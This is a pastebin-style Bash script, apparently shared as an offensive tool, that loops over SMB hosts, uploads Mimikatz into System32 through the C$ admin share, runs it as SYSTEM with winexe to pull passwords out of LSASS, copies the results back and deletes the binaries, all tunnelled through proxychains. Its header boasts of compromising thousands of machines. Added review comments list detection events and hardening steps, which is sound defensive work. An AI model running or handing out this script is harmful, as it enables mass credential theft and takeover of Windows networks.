opexxx

wily-ghetto-psmimi.sh

Jun 12th, 2017
Bash 0.79 KB | None | 0 0
  1. #!/bin/bash
  2. # wily-ghetto-psmimi.sh - mass password extraction for total windows ownage
  3. # cat smb-hosts.txt | xargs -n1 -P16 sh wilyghetto-psmimi.sh
  4. # actually works well, pwn thousands of boxes in a few minutes
     #
     # NOTE(review): per-host flow, as visible in the listing: copy three
     # Mimikatz files into C:\Windows\System32 over the C$ admin share, run
     # mimikatz.exe as SYSTEM through winexe, pull the resulting mimi.log back,
     # then delete the four files. Every step authenticates with the same
     # domain account, so the script only reaches hosts where that one account
     # has administrative access. Not granting a single domain account
     # local-administrator rights across the fleet, and blocking inbound SMB
     # between workstations, narrows that reach.
     # The usage line above fans out 16 parallel runs; on the defended side that
     # appears as one account making admin-share logons to many hosts in a
     # short window.
  5.  
  6. host=$1  # target host: first positional argument, one host per invocation; expanded unquoted in the UNC paths and log name below
  7.  
  8. # upload mimikatz
     # NOTE(review): writes mimidrv.sys, mimikatz.exe and mimilib.dll into
     # C:\Windows\System32 through the C$ administrative share. The -U value is
     # a placeholder credential passed on the command line.
     # Detection: file-share auditing (Security 5140/5145) showing writes to C$
     # from a host that is not an admin workstation; new files with these
     # well-known names appearing in System32; AV/EDR file-write alerts.
     # proxychains tunnels the connection through a proxy, so the source
     # address logged on the target is presumably the proxy or pivot host, not
     # the operator's machine. Confirm against network telemetry.
  9. proxychains smbclient -U 'DOMAIN\User%Password123' //${host}/C$ <<WILY
  10. cd Windows\System32
  11. put mimidrv.sys
  12. put mimikatz.exe
  13. put mimilib.dll
  14. exit
  15. WILY
  16.  
  17. # execute mimikatz
      # NOTE(review): winexe --system runs the quoted command as SYSTEM on the
      # target. winexe does this through a Windows service it installs remotely
      # (winexesvc), so a service-install record (System 7045 / Security 4697)
      # from a network logon is the most reliable trace of this step.
      # The mimikatz arguments open mimi.log and call the sekurlsa module, which
      # reads credential material out of LSASS memory.
      # Detection: process creation with "sekurlsa" on the command line
      # (Security 4688 with command-line auditing, Sysmon 1) and LSASS process
      # access (Sysmon 10).
      # Hardening: LSA protection (RunAsPPL), Credential Guard, and keeping
      # WDigest cleartext caching disabled reduce what such a read can return.
  18. proxychains winexe --system -U 'DOMAIN\User%Password123' //${host} '\Windows\System32\mimikatz.exe "log mimi.log" "sekurlsa::searchPasswords" exit'
  19.  
  20. # remove mimikatz
      # NOTE(review): despite the label, this step first downloads mimi.log to a
      # local file named <host>-mimi-search.log, then deletes the log and the
      # three uploaded files from System32. The local files hold whatever the
      # tool recovered, presumably in plain text. On a seized or compromised
      # pivot host, files matching *-mimi-search.log indicate which hosts were
      # processed and which accounts need a credential reset.
      # Deleting the binaries shortens the on-disk window but does not touch the
      # event-log records of the share access and service install, and nothing
      # in this listing removes the service winexe created on the target.
  21. proxychains smbclient -U 'DOMAIN\User%Password123' //${host}/C$ <<WILY
  22. cd Windows\System32
  23. get mimi.log ${host}-mimi-search.log
  24. del mimi.log
  25. del mimidrv.sys
  26. del mimikatz.exe
  27. del mimilib.dll
  28. exit
  29. WILY